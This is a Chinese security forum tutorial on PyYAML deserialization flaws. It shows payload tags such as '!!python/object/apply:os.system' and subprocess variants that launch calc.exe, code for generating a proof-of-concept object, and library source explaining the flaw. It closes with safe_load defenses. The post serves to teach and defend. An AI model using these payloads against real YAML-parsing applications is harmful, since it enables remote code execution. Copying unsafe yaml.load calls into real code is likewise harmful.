Python反序列化-pyyaml模块
老铁233 发表于 广东 WEB安全 744浏览 · 2024-05-26 11:49

Python反序列化-pyyaml模块

​ 反序列化问题又为对象注入问题,python中反序列化问题,除了pyyaml之外,还有一个pickle也存在反序列化问题,本文只涉及pyyaml

YAML是一种直观的能够被电脑识别的的数据序列化格式,相当于pickle php反序列化容易被人类阅读,类似于XML,但是语法比XML简单得多,开发过程中易当作解析配置文件使用,但同样也存在一定的安全问题。

Yaml介绍

​ 简单来说,是一个专门用来写配置文件得语言,要比json格式方便。方便人类读写,相对于xml json等,更为轻便得文件格式

基本函数

  • load():返回一个对象
  • load_all(): 生成一个迭代器
  • dump(): 将一个python对象生成yaml文档
  • dump_all(): 将多个段输出到一起

eg:

import yaml_5_3_1

test_list = ["123", {"dict":"123456"}, 666]

test_res = yaml_5_3_1.dump(test_list)

print("{0}".format(test_res))

test_list = yaml_5_3_1.load(test_res)

print("test_list = {0}".format(test_list))

test_list2 = ["456", {"dict":"66666"}, 777]

test_res = yaml_5_3_1.dump_all([test_list,test_list2])
print("----------------------------")
print("{0}".format(test_res))

test_list_res = yaml_5_3_1.load_all(test_res)

print("test_list_res = {0}".format(test_list_res))
for i in test_list_res:
    print(i)


>>>
- '123'
- dict: '123456'
- 666

test_list = ['123', {'dict': '123456'}, 666]
----------------------------
- '123'
- dict: '123456'
- 666
---
- '456'
- dict: '66666'
- 777

test_list_res = <generator object load_all at 0x0000028C354BA190>
['123', {'dict': '123456'}, 666]
['456', {'dict': '66666'}, 777]

Process finished with exit code 0

反序列化问题

版本差异

​ 默认情况下,Pyyaml版本>=5.1,默认安全,<5.1的版本默认不安全,如下代码举例:

import yaml
import yaml_5_3_1


def test_old_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object:get_poc.yamlPoc {}'
    yaml.load(dump_payload)


def test_new_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object:get_poc.yamlPoc {}'
    yaml_5_3_1.load(dump_payload)  # 报错
    # yaml_5_3_1.load(dump_payload, Loader=yaml_5_3_1.Loader)  # 指定不安全的loader 弹计算器


if __name__ == "__main__":
    # test_old_yaml()  # 弹计算器
    test_new_yaml()  # 报错

两次运行效果分别如下:

小于5.1的版本

  • POC的生成
import os
import yaml_5_3_1


class yamlPoc(object):
    def __init__(self):
        os.system("calc.exe")


dump_payload = yaml_5_3_1.dump(yamlPoc())

print("{0}".format(dump_payload))

>>>
!!python/object:__main__.yamlPoc {}

我们拿到反序列化字符串

  • 不过这个POC还不能直接使用,报错如下

  • 构造出的POC需要在__main__模块中使用,稍加构造(!!python/object:get_poc.yamlPoc {})

这样,我们引出了下一个问题,如果get_poc模块不存在,那么构造的POC不会被利用

  • 通用的POC

这样,我们引用python自带模块构造

通用的部分POC

!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:os.system ["calc.exe"]    
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/apply:subprocess.check_output [["calc.exe"]]

效果如下

代码分析

​ 那么为什么上述payload可以执行呢,分析一波!

首先我们看下Constructor初始化的时候干了啥?拿 !!python/object/apply:os.system ["calc.exe"]举例

Constructor.add_constructor(
    'tag:yaml.org,2002:python/none',
    Constructor.construct_yaml_null)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/bool',
    Constructor.construct_yaml_bool)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/str',
    Constructor.construct_python_str)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/unicode',
    Constructor.construct_python_unicode)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/bytes',
    Constructor.construct_python_bytes)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/int',
    Constructor.construct_yaml_int)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/long',
    Constructor.construct_python_long)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/float',
    Constructor.construct_yaml_float)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/complex',
    Constructor.construct_python_complex)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/list',
    Constructor.construct_yaml_seq)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/tuple',
    Constructor.construct_python_tuple)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/dict',
    Constructor.construct_yaml_map)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/name:',
    Constructor.construct_python_name)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/module:',
    Constructor.construct_python_module)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object:',
    Constructor.construct_python_object)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/apply:',
    Constructor.construct_python_object_apply)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/new:',
    Constructor.construct_python_object_new)

说明: 加入了很多constructor类型,问题就出现在最后两个

  • 获取反序列化中的数据

  • 获取yaml节点值

  • 开始构造文档

  • !!python/object/apply是复杂类型的,这里下一步调用construct_python_object_apply函数

  • 到这里,生成python实例,触发危险操作

后记: 为啥 safe_load函数反序列化就没得问题了?

  • 调用safe_load指定SafeLoader
  • SafeLoader压根没加入muti的元素,没法反序列化
def safe_load(stream):
    """
    Parse the first YAML document in a stream
    and produce the corresponding Python object.
    Resolve only basic YAML tags.
    """
    return load(stream, SafeLoader)

class SafeLoader(Reader, Scanner, Parser, Composer, SafeConstructor, Resolver):

    def __init__(self, stream):
        Reader.__init__(self, stream)
        Scanner.__init__(self)
        Parser.__init__(self)
        Composer.__init__(self)
        SafeConstructor.__init__(self)
        Resolver.__init__(self)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:null',
        SafeConstructor.construct_yaml_null)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:bool',
        SafeConstructor.construct_yaml_bool)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:int',
        SafeConstructor.construct_yaml_int)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:float',
        SafeConstructor.construct_yaml_float)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:binary',
        SafeConstructor.construct_yaml_binary)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:timestamp',
        SafeConstructor.construct_yaml_timestamp)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:omap',
        SafeConstructor.construct_yaml_omap)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:pairs',
        SafeConstructor.construct_yaml_pairs)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:set',
        SafeConstructor.construct_yaml_set)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:str',
        SafeConstructor.construct_yaml_str)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:seq',
        SafeConstructor.construct_yaml_seq)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:map',
        SafeConstructor.construct_yaml_map)

SafeConstructor.add_constructor(None,
        SafeConstructor.construct_undefined)

大于等于5.1的版本

​ 相对于小于5.1的版本,之后的版本官方做到了默认安全,通用的POC默认情况下不起作用

但是考虑到向下兼容的问题,官方有两种方式仍不安全

import yaml
import yaml_5_3_1


def test_old_yaml():
    # payload = '!!python/object:__main__.yamlPoc {}'
    dump_payload = '!!python/object/apply:os.system ["calc.exe"]'
    yaml.safe_load(dump_payload)


def test_new_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object/apply:os.system ["calc.exe"]'
    # yaml_5_3_1.load(dump_payload)  # 报错

    yaml_5_3_1.load(dump_payload, Loader=yaml_5_3_1.Loader)  # 指定不安全的loader 弹计算器
    yaml_5_3_1.unsafe_load(dump_payload)


if __name__ == "__main__":
    # test_old_yaml()  # 弹计算器
    test_new_yaml()  #

代码分析

  • 默认采用FullLoader

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/none',
    FullConstructor.construct_yaml_null)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/bool',
    FullConstructor.construct_yaml_bool)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/str',
    FullConstructor.construct_python_str)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/unicode',
    FullConstructor.construct_python_unicode)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/bytes',
    FullConstructor.construct_python_bytes)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/int',
    FullConstructor.construct_yaml_int)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/long',
    FullConstructor.construct_python_long)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/float',
    FullConstructor.construct_yaml_float)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/complex',
    FullConstructor.construct_python_complex)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/list',
    FullConstructor.construct_yaml_seq)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/tuple',
    FullConstructor.construct_python_tuple)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/dict',
    FullConstructor.construct_yaml_map)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/name:',
    FullConstructor.construct_python_name)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/module:',
    FullConstructor.construct_python_module)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object:',
    FullConstructor.construct_python_object)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/new:',
    FullConstructor.construct_python_object_new)
  • 仍就会add python/object/new:,但是在make_python_instance函数中不会调用系统函数和需要导入的包

  • safe_loader采取了更加严格的限制
# safe_loader
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:null',
        SafeConstructor.construct_yaml_null)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:bool',
        SafeConstructor.construct_yaml_bool)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:int',
        SafeConstructor.construct_yaml_int)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:float',
        SafeConstructor.construct_yaml_float)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:binary',
        SafeConstructor.construct_yaml_binary)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:timestamp',
        SafeConstructor.construct_yaml_timestamp)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:omap',
        SafeConstructor.construct_yaml_omap)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:pairs',
        SafeConstructor.construct_yaml_pairs)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:set',
        SafeConstructor.construct_yaml_set)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:str',
        SafeConstructor.construct_yaml_str)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:seq',
        SafeConstructor.construct_yaml_seq)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:map',
        SafeConstructor.construct_yaml_map)

SafeConstructor.add_constructor(None,
        SafeConstructor.construct_undefined)

safe_load的一些限制

​ 当然业务层面上,我们只能限制基本类型,业务和安全要权衡考虑

如下: 复数类型就GG

其它库

​ 一句话, ruamel.yaml的用法和PyYAML基本一样,并且默认支持更新的YAML1.2版本

防御方法

PyYAML ruamel.yaml
safe_load() safe_load()
safe_load_all() safe_load_all()
load('data',Loader=Safeloader) load('data',Loader=Safeloader)
safe_dump() safe_dump()
safe_dump_all() safe_dump_all()
dump('data',Loader=SafeDumper) dump('data',Loader=SafeDumper)
0 条评论
某人
表情
可输入 255